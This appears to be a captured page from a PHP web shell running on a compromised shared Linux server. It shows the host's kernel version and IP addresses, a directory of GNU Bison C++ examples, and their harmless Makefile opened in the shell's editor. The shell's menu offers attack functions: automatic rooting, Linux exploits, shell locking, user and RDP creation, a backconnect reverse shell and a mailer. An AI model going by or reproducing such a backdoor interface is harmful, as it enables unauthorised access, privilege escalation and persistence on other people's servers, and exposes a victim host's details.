Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
bison /
examples /
c++ /
[ HOME SHELL ]
Name
Size
Permission
Action
calc++
[ DIR ]
drwxr-xr-x
Makefile
418
B
-rw-r--r--
README.md
2.28
KB
-rw-r--r--
simple.yy
2.17
KB
-rw-r--r--
variant-11.yy
3.62
KB
-rw-r--r--
variant.yy
3.24
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile
# This Makefile is designed to be simple and readable. It does not # aim at portability. It requires GNU Make. BISON = bison CXX = g++ CXXFLAGS = PROGS = simple variant variant-11 simple: CXXFLAGS = -std=c++14 variant-11: CXXFLAGS = -std=c++11 all: $(PROGS) %.cc %.hh %.html %.gv: %.yy $(BISON) $(BISONFLAGS) --html --graph -o $*.cc $< %: %.cc $(CXX) $(CXXFLAGS) -o$@ $< clean: rm -f $(PROGS:=.cc) $(PROGS)
Close